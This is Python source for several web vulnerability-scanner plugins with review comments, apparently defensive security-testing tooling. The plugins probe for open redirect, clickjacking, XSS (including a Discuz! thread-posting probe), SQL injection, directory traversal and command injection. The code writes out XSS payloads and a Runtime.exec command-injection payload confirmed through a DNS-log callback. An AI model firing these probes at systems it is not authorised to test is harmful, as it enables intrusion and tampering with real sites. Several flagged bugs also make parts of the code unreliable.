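def run_url(http, ob, item):
    """Probe one crawled URL for an open redirect (任意网址跳转).

    Every query parameter whose current value already carries a host
    (``getDomain`` is truthy for it) is overwritten with a fixed external
    address.  The rebuilt URL is fetched once; if the body contains the
    marker text of that external site, the target followed the injected
    address and a record is emitted.

    Args:
        http: unused -- a fresh ``Http`` client is created so that the
            per-site ``ob['webTimeout']`` is honoured.
        ob: site configuration; reads ``domain`` and ``level``, optionally
            ``webTimeout`` and ``source_ip`` (the request goes to
            ``source_ip`` while the Host header keeps ``domain``).
        item: crawled request; reads ``url`` and ``refer``.

    Returns:
        list of ``getRecord`` results -- empty when nothing was found or an
        exception was caught and logged.
    """
    header = {
        "Host": ob['domain'],
        "Connection": "keep-alive",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
        "Referer": item['refer'],
        "User-Agent":
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
        "Accept":
        "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        # "Cookie": ob.get('cookie')
    }
    # Bound before the try so the except branch can always return it
    # (it used to be assigned halfway through the try, after calls that
    # can raise).
    result = []
    marker = 'OpenResty 是一个基于 NGINX 和 LuaJIT 的 Web 平台。'
    try:
        path = item['url']
        # Separate name: rebinding ``http`` would silently shadow the
        # client the caller handed in.
        client = Http(timeout=ob.get('webTimeout'))
        url_parse = urlparse(path)
        netloc = ob.get('source_ip') or url_parse.netloc
        query_dict = post_query2dict(path)
        # Only parameters that already hold a URL are redirect candidates.
        for key in list(query_dict):
            if getDomain(query_dict[key]):
                query_dict[key] = 'http://openresty.org/cn/'
        new_query = dict2query(query_dict)
        new_url = "%s://%s%s?%s" % (url_parse.scheme, netloc, url_parse.path,
                                    new_query)
        res, content = client.request(new_url, 'GET', headers=header)

        if marker in content:
            response = getResponse(res, content, marker)
            # NOTE(review): the evidence records ``path`` with method 'POST',
            # but the probe actually sent ``new_url`` as a GET -- confirm
            # which one the report consumer expects.
            request = getRequest(path,
                                 'POST',
                                 headers=header,
                                 domain=ob['domain'])
            detail = "存在任意网址跳转漏洞"
            result.append(
                getRecord(ob, path, ob['level'], detail, request, response))
    except Exception as e:
        logger.error("File:PageredirectsScript_yd.py, run_url function :%s" %
                     (str(e)))
    return result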
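def run_url(http, config, item):
    '''
    Replay one crawled request and report any <iframe> that loads from
    another host.

    Despite the file name this is not a frame-busting / X-Frame-Options
    check: the page is fetched as crawled, every ``<iframe ... src="...">``
    is extracted, and the first one whose host differs from
    ``config['domain']`` produces a record ("iframe连接到了外站").  Relative
    sources (empty host) are never reported.

    Args:
        http: unused; the module-level ``request`` helper does the fetch.
        config: site configuration -- siteId, ip, domain, level, vulId,
            cookie and optionally source_ip (request goes there, the Host
            header keeps domain).
        item: crawled request with ``url``, ``method`` and ``params``.

    Returns:
        list with at most one ``getRecord2`` entry; empty when nothing
        matched or an exception was caught and logged.
    '''
    responseList = []
    try:
        # Only the fields the record needs are copied out of the config.
        scanInfo = {k: config[k] for k in ('siteId', 'ip', 'domain', 'level', 'vulId')}

        # headerDictDefault is module-level: copy it so this site's cookie
        # and Host header do not leak into every later call.
        headers = dict(headerDictDefault)
        headers['cookie'] = config['cookie']
        headers['Host'] = config['domain']

        url_parse = urlparse.urlparse(item['url'])
        host = config.get('source_ip') or url_parse.netloc
        new_url = "%s://%s%s" % (url_parse.scheme, host, url_parse.path)
        if url_parse.query:
            new_url = "%s?%s" % (new_url, url_parse.query)

        if item['method'].lower() == 'get':
            # NOTE(review): when the crawled url already has a query this
            # yields "...?query?params" -- confirm what ``params`` holds
            # for GET items.
            url = "%s?%s" % (new_url, item['params'])
            bodyDict = {}
        else:
            url = new_url
            bodyDict = db_params2dict(item['params'])

        response = request(url=url, body=dict2query(bodyDict), headers=headers, method=item['method'])
        # Tag names are case-insensitive; single-quoted or unquoted src
        # attributes are still not matched by this pattern.
        pattern = r'<iframe.*?src="(.*?)"'
        for src in re.findall(pattern, response['response_body'], re.I):
            frame_host = urlparse.urlparse(src).netloc
            # NOTE(review): plain string compare -- "site.com:80" or a
            # sub-domain counts as foreign; confirm that is intended.
            if frame_host != scanInfo['domain']:
                injectInfo = returnInjectResult(url=url, confirm=0, detail='点击劫持,iframe连接到了外站', response=response)
                responseList.append(getRecord2(scanInfo, injectInfo))
                break
    except Exception as e:
        logger.error("File:ClickJacking_iframe.py, run_url function :%s" % (str(e)))
    return responseList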
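def run_url(http, ob, item):
    """Reflected-XSS probe for one crawled request.

    Every payload in ``inj_list`` is injected into each injectable
    position -- appended to the path when a GET carries no params,
    otherwise appended to every query key (GET and POST) and every body
    key (POST) one at a time -- and the response is searched for the
    reflected marker (``re_obj``).

    Args:
        http: client whose ``request(url=, method=, headers=, body=)``
            returns ``(res, content)``.
        ob: site configuration; reads ``scheme``, ``domain``, ``level`` and
            optionally ``source_ip`` (the request goes there, the Host
            header keeps ``domain``).
        item: crawled request with ``url``, ``method`` and ``params``.

    Returns:
        list of ``getRecord`` results, one per reflected payload; empty
        when the method is missing/unsupported or nothing was reflected.
        If an exception is caught and logged, the records collected so far
        are still returned.
    """
    method = item.get('method')
    if not method:
        return []
    method = method.lower()
    if method not in ('get', 'post'):
        return []
    params = item.get('params')

    inj_list = [
        # '''<sCrIpt>alert(123)</ScRiPt>''',
        # ''''><sCrIpt>alert(123)</ScRiPt>''',
        # '''"><sCrIpt>alert(123)</ScRiPt>''',
        # '''';</ScrIpt><sCrIpt>alert(123)</ScRiPt>//''',
        # '''";</ScrIpt><sCrIpt>alert(123)</ScRiPt>//''',
        '''-->''''''"""""">>>>>>;;;;;;</ScrIpt><sCrIpt>alert(123)</ScRiPt>//''',
        '''-->''''''"""""">>>>>>;;;;;;<source%20onerror="javascript:alert(123)">''',
        '''-->''''''"""""">>>>>>;;;;;;<img src=1 onerror=alert(1)>'''
    ]

    url = item['url']
    scheme = ob['scheme']
    domain = ob['domain']
    header = {'Host': domain}
    source_ip = ob.get('source_ip')
    if source_ip:
        domain = source_ip
    url_path = urlparse.urlparse(url).path
    result = []

    # Flags belong to compile(): the second positional argument of a
    # compiled pattern's search() is the start offset, so the earlier
    # ``re_obj.search(content, re.I)`` skipped two characters and stayed
    # case-sensitive -- the mixed-case <sCrIpt> reflection was never caught.
    re_obj = re.compile(r'(<script>alert\(123\)</script>|javascript:alert\(123\)">|onerror=alert\(1\)>)', re.I)
    detail = "检测到XSS漏洞"

    def record_if_reflected(new_url, res, content, build_request):
        """Append a record when the marker is reflected in ``content``."""
        if re_obj.search(content):
            request = build_request(new_url, domain=ob['domain'])
            response = getResponse(res, content)
            result.append(getRecord(ob, new_url, ob['level'], detail, request, response))

    try:
        # get 方法
        if method == 'get':
            # 没有参数,就直接路径注入
            if not params:
                for payload in inj_list:
                    sep = '' if url_path and url_path[-1] == '/' else '/'
                    new_url = '%s://%s%s%s%s' % (scheme, domain, url_path, sep, payload)
                    res, content = http.request(url=new_url, method='GET', headers=header)
                    record_if_reflected(new_url, res, content, getRequest)
            # 有参数就参数注入,query注入
            else:
                for new_query in _inject_each_key(query2dict(params), inj_list, True):
                    new_url = '%s://%s%s?%s' % (scheme, domain, url_path, new_query)
                    res, content = http.request(url=new_url, method='GET', headers=header)
                    record_if_reflected(new_url, res, content, getRequest)
        # post 方法
        else:
            query = urlparse.urlparse(url).query
            body = params
            # query 部分注入,body不变
            if query:
                body_str = None
                if body:
                    body_str = dict2query(params_dict=db_params2dict(body), isUrlEncode=False)
                for new_query in _inject_each_key(query2dict(query), inj_list, True):
                    new_url = '%s://%s%s?%s' % (scheme, domain, url_path, new_query)
                    res, content = http.request(url=new_url, method='POST', headers=header, body=body_str)
                    record_if_reflected(new_url, res, content, postRequest)
            # body部分注入,query不变
            if body:
                new_url = '%s://%s%s?%s' % (scheme, domain, url_path, query)
                for new_params in _inject_each_key(db_params2dict(body), inj_list, False):
                    res, content = http.request(url=new_url, method='POST', headers=header, body=new_params)
                    record_if_reflected(new_url, res, content, postRequest)
    except Exception as e:
        logger.error("File:xss_inject_new.py, run_url function get method:%s" % (str(e)))
    # The result list was built but never returned before; callers always
    # received None.
    return result


def _inject_each_key(params_dict, payloads, is_url_encode):
    """Yield ``params_dict`` serialised once per (payload, key) pair.

    For each payload and each key, the payload is appended to that key's
    current value (``'1'`` when the value is empty) while every other key
    is left untouched.  ``is_url_encode`` is passed through to
    ``dict2query``.
    """
    for payload in payloads:
        for key, value in params_dict.iteritems():
            injected = deepcopy(params_dict)
            injected[key] = (str(value) if value else '1') + payload
            yield dict2query(params_dict=injected, isUrlEncode=is_url_encode)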
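def run_domain(http, config):
    '''
    Site-level probe for an XSS through the Discuz! ``[email=...]`` bbcode.

    Walks the forum with the session cookie from ``config['cookie']``:
    GET /forum.php to pick a forum id, GET the new-thread form to read its
    hidden formhash / posttime tokens, then POST a test thread whose
    message carries an ``[email=...]`` tag with an injected event handler,
    and finally re-fetch to see whether the handler survived unescaped.

    This probe creates content on the target (a thread titled
    '这里是测试xss_bbcode帖子'); run it only where that is acceptable.

    Args:
        http: unused; the module-level ``request`` helper does the fetch.
        config: site configuration -- siteId, ip, scheme, domain, level,
            vulId, cookie and optionally source_ip (request goes there,
            the Host header keeps domain).

    Returns:
        list with at most one ``getRecord2`` entry; empty when any step
        does not answer 200, no forum / token is found, nothing matched,
        or an exception was caught and logged.
    '''
    scanInfo = {
        'siteId': config['siteId'],
        'ip': config['ip'],
        'scheme': config['scheme'],
        'domain': config['domain'],
        'level': config['level'],
        'vulId': config['vulId'],
    }
    # headers = headerDictDefault
    headers = {
        'Accept-Language': 'en-US,en;q=0.5',
        'Connection': 'keep-alive',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0',
        #    'Host': 'discuzx15.target.safety.local.com',
        'Cache-Control': 'max-age=0',
        'Host': config['domain']
    }
    headers['cookie'] = config['cookie']

    responseList = []
    try:
        host = config.get('source_ip') or scanInfo['domain']
        urlBase = scanInfo['scheme'] + "://" + host

        urlForum = urlBase + "/forum.php"
        response = request(url=urlForum, headers=headers, method="GET")
        # 状态码不正确,退出
        if response['httpcode'] != 200:
            return []
        patternForumid = re.compile(r'<a\shref\=".*?mod\=forumdisplay&fid\=(.*?)"', re.I | re.M | re.S)
        tmpResult = patternForumid.findall(response['response_body'])
        # 没有找到相应的版块,程序退出
        if not tmpResult:
            return []
        # First forum on the page; the old list(set(...))[0] picked an
        # arbitrary one and made runs non-reproducible.
        forumid = tmpResult[0]

        newthreadUrl = urlBase + "/forum.php?mod=post&action=newthread&fid=" + forumid
        headers['Referer'] = urlBase + "/forum.php?mod=forumdisplay&fid=" + forumid
        response = request(url=newthreadUrl, headers=headers, method="GET")
        if response['httpcode'] != 200:
            return []
        tmpForumhash = re.compile(r'<input.*?name\="formhash"\sid\="formhash"\svalue\="(.*?)"',
                                  re.I | re.M | re.S).findall(response['response_body'])
        tmpPosttime = re.compile(r'<input.*?name\="posttime"\sid\="posttime"\svalue\="(.*?)"',
                                 re.I | re.M | re.S).findall(response['response_body'])
        # Without both hidden tokens the post form cannot be submitted
        # (not logged in, or the form layout changed); before, this raised
        # IndexError into the except branch.
        if not tmpForumhash or not tmpPosttime:
            return []

        # NOTE(review): the token is read from the hidden field named
        # "formhash" but posted back under the key 'forumhash' -- confirm
        # the field name the target expects before relying on this probe.
        formdata = {
            'forumhash': tmpForumhash[0],
            'posttime': tmpPosttime[0],
            'subject': '这里是测试xss_bbcode帖子',
            'message': '[email=2"onmouseover="alert(\'tester_xss_bbcode\')]2[/email]',
            'wysiwyg': '1',
            'fid': forumid,
            'checkbox': 0,
        }
        postUrl = urlBase + "/forum.php?mod=post&action=newthread&fid=" + forumid + "&extra=&topicsubmit=yes"
        body = dict2query(formdata)
        headers['Referer'] = newthreadUrl
        response = request(url=postUrl, body=body, headers=headers, method="POST")
        if response['httpcode'] != 200:
            return []
        # The verification below used to sit behind a debugging
        # ``sys.exit(1)``; SystemExit is not an Exception, so that call
        # terminated the whole scanner process after the thread was posted.
        # NOTE(review): this re-fetches the submit URL rather than the
        # created thread (the original extracted the page's "编辑" link and
        # discarded it) -- verify against a live Discuz! instance.
        response = request(url=postUrl, headers=headers, method="GET")
        patternXssBbcode = re.compile(r'alert\(\'tester_xss_bbcode\'\)', re.I | re.M | re.S)
        # search(), not match(): the marker sits somewhere inside the body,
        # never at offset 0.
        if patternXssBbcode.search(response['response_body']):
            # NOTE(review): the detail text describes a blind SQL injection
            # in notify_credit.php while the probe is a bbcode XSS -- looks
            # copy-pasted from another plugin; confirm the intended wording.
            injectInfo = returnInjectResult(url=urlBase, confirm=1,
                                            detail="Discuz! X1-1.5 的 notify_credit.php 文件由于没有对用户输入进行有效的过滤导致存在SQL盲注",
                                            response=response)
            responseList.append(getRecord2(scanInfo, injectInfo))
    except Exception as e:
        logger.error("File:DiscuzX15_notify_credit.py:" + str(e))
    return responseList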
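def run_inj(http, ob, item, payloads, inj_type=None):
    """Boolean- or error-based SQL injection probe for one crawled request.

    ``payloads`` is a ``(true_payload, false_payload)`` pair.  For every
    injectable key -- each query key for GET; for POST each key of the URL
    query (body replayed unchanged) and each key of the body (query
    unchanged) -- both payloads are appended to the key's value one after
    the other and the two responses are compared by ``_judge_pair``:

    * ``inj_type == "ERROR型"``: either response showing a database error
      (``check_db_error``) is reported.
    * otherwise: reported when the two pages differ
      (``check_page_similar``) and the true-payload page is not the site's
      WAF block page (``page_similar`` against ``ob['waf_page']``).

    Args:
        http: client whose ``request(url=, method=, headers=, body=)``
            returns ``(res, content)``; ``res`` supports ``.get('status')``.
        ob: site configuration; reads ``scheme``, ``domain``, ``level`` and
            optionally ``source_ip`` (the request goes there, the Host
            header keeps ``domain``) and ``waf_page``.
        item: crawled request with ``url``, ``method`` and ``params``.
        payloads: two-item sequence ``(payload_t, payload_f)``.
        inj_type: label used in the record detail; ``"ERROR型"`` selects the
            error-based check.

    Returns:
        list of ``getRecord`` results; empty when the method is missing /
        unsupported or there are no params.  If an exception is caught and
        logged, the records collected so far are still returned (the
        function used to return None in every case).
    """
    method = item.get('method')
    if not method:
        return []
    method = method.lower()
    if method not in ('get', 'post'):
        return []
    params = item.get('params')
    if not params:
        return []

    url = item['url']
    scheme = ob['scheme']
    domain = ob['domain']
    header = {'Host': domain}
    source_ip = ob.get('source_ip')
    if source_ip:
        domain = source_ip
    url_path = urlparse.urlparse(url).path
    result = []

    def get_evidence(probe_url, _body):
        """Evidence request for a GET probe (body unused)."""
        return getRequest(probe_url, domain=ob['domain'])

    def post_evidence(probe_url, probe_body):
        """Evidence request for a POST probe."""
        return postRequest(probe_url, body=probe_body, domain=ob['domain'])

    try:
        # get 方法
        if method == 'get':
            query_dict = query2dict(params)
            for key, value in query_dict.iteritems():
                query_t, query_f = _inject_pair(query_dict, key, value, payloads)
                url_t = '%s://%s%s?%s' % (scheme, domain, url_path, query_t)
                url_f = '%s://%s%s?%s' % (scheme, domain, url_path, query_f)
                res_t, content_t = http.request(url=url_t,
                                                method='GET',
                                                headers=header)
                res_f, content_f = http.request(url=url_f,
                                                method='GET',
                                                headers=header)
                record = _judge_pair(ob, inj_type,
                                     (url_t, None, res_t, content_t),
                                     (url_f, None, res_f, content_f),
                                     get_evidence)
                if record:
                    result.append(record)
        # post 方法
        else:
            query = urlparse.urlparse(url).query
            body = params
            # query 部分注入,body不变
            if query:
                body_str = ''
                if body:
                    body_str = dict2query(params_dict=db_params2dict(body),
                                          isUrlEncode=True)
                query_dict = query2dict(query)
                for key, value in query_dict.iteritems():
                    query_t, query_f = _inject_pair(query_dict, key, value, payloads)
                    url_t = '%s://%s%s?%s' % (scheme, domain, url_path,
                                              query_t)
                    url_f = '%s://%s%s?%s' % (scheme, domain, url_path,
                                              query_f)
                    res_t, content_t = http.request(url=url_t,
                                                    method='POST',
                                                    headers=header,
                                                    body=body_str)
                    res_f, content_f = http.request(url=url_f,
                                                    method='POST',
                                                    headers=header,
                                                    body=body_str)
                    # Evidence now names the url whose response is attached
                    # (the false-payload branches used to record url_t with
                    # response_f).
                    record = _judge_pair(ob, inj_type,
                                         (url_t, body_str, res_t, content_t),
                                         (url_f, body_str, res_f, content_f),
                                         post_evidence)
                    if record:
                        result.append(record)
            # body部分注入,query不变
            if body:
                params_dict = db_params2dict(body)
                new_url = '%s://%s%s?%s' % (scheme, domain, url_path,
                                            query)
                for key, value in params_dict.iteritems():
                    params_t, params_f = _inject_pair(params_dict, key, value, payloads)
                    res_t, content_t = http.request(url=new_url,
                                                    method='POST',
                                                    headers=header,
                                                    body=params_t)
                    res_f, content_f = http.request(url=new_url,
                                                    method='POST',
                                                    headers=header,
                                                    body=params_f)
                    record = _judge_pair(ob, inj_type,
                                         (new_url, params_t, res_t, content_t),
                                         (new_url, params_f, res_f, content_f),
                                         post_evidence)
                    if record:
                        result.append(record)
    except Exception as e:
        logger.error("File:sql_inject_new.py, run_url function:%s" % (str(e)))
    return result


def _inject_pair(params_dict, key, value, payloads):
    """Return ``(query_t, query_f)``: ``params_dict`` serialised with the
    true and then the false payload appended to ``key``'s value.

    An empty value is replaced by ``'1'`` before the payload is appended
    so the injected expression is always attached to something.  Raises
    ValueError when ``payloads`` is not a two-item sequence.
    """
    payload_t, payload_f = payloads
    base = value if value else '1'
    injected = deepcopy(params_dict)
    injected[key] = base + payload_t
    query_t = dict2query(params_dict=injected, isUrlEncode=True)
    injected[key] = base + payload_f
    query_f = dict2query(params_dict=injected, isUrlEncode=True)
    return query_t, query_f


def _judge_pair(ob, inj_type, probe_t, probe_f, build_request):
    """Decide whether a true/false probe pair indicates injection.

    Each probe is ``(url, body, res, content)``; ``build_request(url, body)``
    builds the evidence request.  Returns the ``getRecord`` entry to
    report, or ``None``.

    * ``"ERROR型"``: the first of the two responses for which
      ``check_db_error`` fires is reported with its own url/body/response.
    * otherwise: reported (false-payload probe as evidence) when the two
      pages differ and the true-payload page is not the WAF block page --
      a page that looks like the WAF page means the payload was blocked,
      not executed.
    """
    detail = "检测到 %s sql注入漏洞" % inj_type
    if "ERROR型" == inj_type:
        for probe_url, probe_body, res, content in (probe_t, probe_f):
            has_error, _db_type, _msg = check_db_error(content)
            if has_error:
                return getRecord(ob, probe_url, ob['level'], detail,
                                 build_request(probe_url, probe_body),
                                 getResponse(res, content))
        return None

    url_t, _body_t, res_t, content_t = probe_t
    url_f, body_f, res_f, content_f = probe_f
    status_t = res_t.get('status', '0')
    status_f = res_f.get('status', '0')
    similar = check_page_similar(status1=status_t,
                                 content1=content_t,
                                 status2=status_f,
                                 content2=content_f)
    similar_waf = page_similar(status_t, content_t,
                               ob.get('waf_page'))
    # The POST branches used to require ``similar_waf`` to be *true*, the
    # opposite of the GET branch; the GET condition (differ, and not the
    # WAF page) is the one kept for all three injection positions.
    if similar or similar_waf:
        return None
    return getRecord(ob, url_f, ob['level'], detail,
                     build_request(url_f, body_f),
                     getResponse(res_f, content_f))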
def run_url(http, ob, item):
    """Probe one crawled request for Windows directory-traversal payloads.

    Args:
        http: HTTP client, passed through to ``traversal_params``.
        ob: per-target config dict; reads ``domain``, ``cookie``,
            ``source_ip`` and ``level``.
        item: crawled request dict; reads ``url``, ``params`` and ``method``.

    Returns:
        ``[]`` when the request carries neither ``params`` nor a query
        string. Otherwise nothing (``None``): ``result`` is filled but the
        function has no final ``return`` -- NOTE(review): looks like a
        missing ``return result``; the sibling checks do return their list.

    Every parameter whose name matches ``page|download|path|file|target``
    is replaced, one at a time, by each value of the module-level
    ``inj_path_list``; ``traversal_params`` sends the request and hands
    back whatever findings should be appended. Any exception (for example
    ``AttributeError`` when ``method`` is missing, since ``.lower()`` is
    called on it unguarded) is caught by the broad ``except`` at the bottom
    and only logged.
    """
    header = {
        "Pragma": "no-cache",
        "User-Agent":
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
        "Accept":
        "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Cache-Control": "no-cache",
        # ``ob.get('cookie')`` may be None; send an empty Cookie header then.
        "Cookie": ob.get('cookie') if ob.get('cookie') else '',
        "Connection": "keep-alive",
        # Host keeps the logical domain even when the request is routed to
        # ``source_ip`` below.
        "Host": ob['domain']
    }

    result = []
    try:
        url = item.get('url')
        params = item.get('params')
        method = item.get('method')
        source_ip = ob.get('source_ip')
        url_parse = urlparse(url)
        scheme = url_parse.scheme
        domain = url_parse.netloc
        path = url_parse.path
        query = url_parse.query
        # Send to the configured origin IP, if any (Host header unchanged).
        if source_ip:
            domain = source_ip
        # Nothing to inject into: skip this request.
        if not params and not query:
            return []
        # GET: the crawled ``params`` (if any) replace the URL's own query.
        if method.lower() == 'get':
            if params:
                query = params
            # Cheap keyword pre-filter on the raw query before parsing it.
            if query and re.search('page|download|path|file|target', query,
                                   re.I):
                query_dict = query2dict(query)
                for key in query_dict.keys():
                    if re.search('page|download|path|file|target', key, re.I):
                        for inj_value in inj_path_list:
                            # Work on a copy so each payload is tested alone.
                            query_bak = deepcopy(query_dict)
                            query_bak[key] = inj_value
                            new_query = dict2query(query_bak,
                                                   isUrlEncode=False)
                            new_url = "%s://%s%s?%s" % (scheme, domain, path,
                                                        new_query)
                            data = traversal_params(ob, http, new_url, 'GET',
                                                    '', header)
                            # First hit on this parameter is enough; move on
                            # to the next key.
                            if data:
                                result.extend(data)
                                break
        elif method.lower() == 'post':
            body_dict = db_params2dict(params)
            # Inject into the query string; body is sent unchanged.
            if query and re.search('page|download|path|file|target', query,
                                   re.I):
                query_dict = query2dict(query)
                for key in query_dict.keys():
                    if re.search('page|download|path|file|target', key, re.I):
                        for inj_value in inj_path_list:
                            query_bak = deepcopy(query_dict)
                            query_bak[key] = inj_value
                            new_query = dict2query(query_bak,
                                                   isUrlEncode=False)
                            new_url = "%s://%s%s?%s" % (scheme, domain, path,
                                                        new_query)
                            data = traversal_params(
                                ob, http, new_url, 'POST',
                                dict2query(body_dict, isUrlEncode=False),
                                header)
                            if data:
                                result.extend(data)
                                break
            # Inject into the body; query string is sent unchanged. The
            # keyword pre-filter runs on the raw ``params`` string here.
            if body_dict and re.search('page|download|path|file|target',
                                       str(params), re.I):
                new_url = "%s://%s%s?%s" % (scheme, domain, path, query)
                for key in body_dict.keys():
                    if re.search('page|download|path|file|target', key, re.I):
                        for inj_value in inj_path_list:
                            body_bak = deepcopy(body_dict)
                            body_bak[key] = inj_value
                            new_body = dict2query(body_bak, isUrlEncode=False)
                            data = traversal_params(ob, http, new_url, 'POST',
                                                    new_body, header)
                            if data:
                                result.extend(data)
                                break
    # Broad catch: every failure above (parse error, missing key, transport
    # error) ends the check for this item with a single log line.
    except Exception, e:
        logger.error("File:dir_traversal_win_url.py, run_url function :%s" %
                     (str(e)))
def run_url(http, ob, item):
    """Out-of-band command-injection check decided by a DNS-log callback.

    Args:
        http: HTTP client; ``http.request`` is called directly here.
        ob: per-target config dict; reads ``domain``, ``cookie``,
            ``source_ip`` and ``level``.
        item: crawled request dict; reads ``url``, ``params`` and ``method``.

    Returns:
        Nothing. ``result`` collects ``getRecord`` entries, but the function
        has no ``return`` statement -- NOTE(review): presumably a missing
        ``return result`` (the sibling checks return their list).

    ``_cmd_poc()`` yields a random token plus a list of probe commands; each
    candidate parameter value gets ``';' + ping_cmd`` appended and the
    request is sent. Detection rests solely on ``callback(random_str)``
    (whether the token showed up in the DNS log); the HTTP response body
    ``content`` is received but never inspected. A second pass puts an
    expression into the *parameter name* instead of the value.

    Caveats visible in the code below:
    * ``.keys()[0]`` raises ``IndexError`` on an empty dict (and ``TypeError``
      on Python 3, where ``keys()`` returns a view); the broad ``except`` at
      the bottom turns that into a log line and abandons the rest of the
      check for this item.
    * In each parameter-name loop ``kk`` is reassigned from its previous
      value, so every iteration after the first wraps the already-wrapped
      name rather than the original one.
    * The error log names ``run_domain`` although this function is
      ``run_url``.
    """
    result = []
    try:
        method = item['method']
        domain = ob['domain']
        # Only Host and Cookie are sent; ``ob['cookie']`` must exist (KeyError
        # otherwise, swallowed by the except below).
        header = {
            'Host': domain,
            'Cookie': ob['cookie'] if ob['cookie'] else ''
        }
        source_ip = ob.get('source_ip')
        url = item['url']
        params = item['params']
        # p1 = r'\bexec\b|command|\bcmd\b'
        # p2 = r'command|\bcmd\b'
        # if not params:
        #     return result
        # if not (re.search(p1, url, re.I) or re.search(p2, params, re.I|re.M)):
        #     return result
        url_parse = urlparse(url)
        scheme = url_parse.scheme
        # ``domain`` is rebound to the URL's netloc; the Host header above
        # still carries ``ob['domain']``.
        domain = url_parse.netloc
        path = url_parse.path
        query = url_parse.query

        # Route the request to the configured origin IP, if any.
        if source_ip:
            domain = source_ip
        # if query:
        #     url = "%s://%s%s?%s" % (scheme, domain, path, query)
        # else:
        #     url = "%s://%s%s" % (scheme, domain, path)

        # GET: the crawled ``params`` string is the query to mutate.
        if method.lower() == 'get':
            query_dict = query2dict(params)

            for k, v in query_dict.items():
                # Fresh token per parameter so a hit is attributable to it.
                random_str, ping_cmd_list = _cmd_poc()
                for ping_cmd in ping_cmd_list:
                    query_dict_cp = deepcopy(query_dict)
                    if v:
                        query_dict_cp[k] = v + ';' + ping_cmd
                    else:
                        query_dict_cp[k] = ';' + ping_cmd
                    query_cmd = dict2query(params_dict=query_dict_cp,
                                           isUrlEncode=True)
                    cmd_url = '%s://%s%s?%s' % (scheme, domain, path,
                                                query_cmd)
                    res, content = http.request(url=cmd_url,
                                                method='GET',
                                                headers=header)
                    # Out-of-band signal only; ``content`` is not examined.
                    if callback(random_str):
                        detail = "通过dns log检测到命令执行漏洞"
                        request = getRequest(cmd_url, domain=ob['domain'])
                        response = getResponse(res)
                        result.append(
                            getRecord(ob, cmd_url, ob['level'], detail,
                                      request, response))
                        break
            # Parameter-name injection check (first key only).
            kk = query_dict.keys()[0]
            vv = query_dict[kk]
            random_str, ping_cmd_list = _cmd_poc()
            for ping_cmd in ping_cmd_list:

                # NOTE(review): ``kk`` accumulates across iterations.
                kk = "%s[T(java.lang.Runtime).getRuntime().exec(\"%s\")/sslegend]" % (
                    kk, ping_cmd)

                cmd_url = '%s://%s%s?%s' % (scheme, domain, path, "%s=%s" %
                                            (kk, vv))
                res, content = http.request(url=cmd_url,
                                            method='GET',
                                            headers=header)
                if callback(random_str):
                    detail = "通过dns log检测到命令执行漏洞"
                    request = getRequest(cmd_url, domain=ob['domain'])
                    response = getResponse(res)
                    result.append(
                        getRecord(ob, cmd_url, ob['level'], detail, request,
                                  response))
                    break
        # Any non-GET method is handled as POST.
        else:
            body = params
            # Inject into the query part; body is sent unchanged.
            if query:
                body_str = ''
                if body:
                    body_dict = db_params2dict(body)
                    body_str = dict2query(params_dict=body_dict,
                                          isUrlEncode=True)
                # NOTE(review): parses ``params`` (the body) rather than
                # ``query`` here -- confirm that is intended.
                query_dict = query2dict(params)
                for k, v in query_dict.items():
                    random_str, ping_cmd_list = _cmd_poc()
                    for ping_cmd in ping_cmd_list:
                        query_dict_cp = deepcopy(query_dict)
                        if v:
                            query_dict_cp[k] = v + ';' + ping_cmd
                        else:
                            query_dict_cp[k] = ';' + ping_cmd
                        query_cmd = dict2query(params_dict=query_dict_cp,
                                               isUrlEncode=True)
                        cmd_url = '%s://%s%s?%s' % (scheme, domain, path,
                                                    query_cmd)
                        res, content = http.request(url=cmd_url,
                                                    method='POST',
                                                    body=body_str,
                                                    headers=header)
                        if callback(random_str):
                            detail = "通过dns log检测到命令执行漏洞"
                            request = getRequest(cmd_url, domain=ob['domain'])
                            response = getResponse(res)
                            result.append(
                                getRecord(ob, cmd_url, ob['level'], detail,
                                          request, response))
                            break
                # Parameter-name injection check (first key only).
                kk = query_dict.keys()[0]
                vv = query_dict[kk]
                random_str, ping_cmd_list = _cmd_poc()
                for ping_cmd in ping_cmd_list:

                    # NOTE(review): ``kk`` accumulates across iterations.
                    kk = "%s[T(java.lang.Runtime).getRuntime().exec(\"%s\")/sslegend]" % (
                        kk, ping_cmd)

                    cmd_url = '%s://%s%s?%s' % (scheme, domain, path, "%s=%s" %
                                                (kk, vv))
                    # NOTE(review): sent as GET with no body even though this
                    # is the POST branch -- confirm intended.
                    res, content = http.request(url=cmd_url,
                                                method='GET',
                                                headers=header)
                    if callback(random_str):
                        detail = "通过dns log检测到命令执行漏洞"
                        request = getRequest(cmd_url, domain=ob['domain'])
                        response = getResponse(res)
                        result.append(
                            getRecord(ob, cmd_url, ob['level'], detail,
                                      request, response))
                        break
            # Inject into the body; original query string is kept in the URL.
            if body:
                params_dict = db_params2dict(body)
                for k, v in params_dict.iteritems():
                    random_str, ping_cmd_list = _cmd_poc()
                    for ping_cmd in ping_cmd_list:
                        params_dict_cp = deepcopy(params_dict)
                        if v:
                            params_dict_cp[k] = v + ';' + ping_cmd
                        else:
                            params_dict_cp[k] = ';' + ping_cmd

                        params_cmd = dict2query(params_dict=params_dict_cp,
                                                isUrlEncode=True)
                        cmd_url = '%s://%s%s?%s' % (scheme, domain, path,
                                                    query)

                        res, content = http.request(url=cmd_url,
                                                    method='POST',
                                                    body=params_cmd,
                                                    headers=header)
                        if callback(random_str):
                            detail = "通过dns log检测到命令执行漏洞"
                            request = getRequest(cmd_url, domain=ob['domain'])
                            response = getResponse(res)
                            result.append(
                                getRecord(ob, cmd_url, ob['level'], detail,
                                          request, response))
                            break
                # Parameter-name injection check (first key only).
                kk = params_dict.keys()[0]
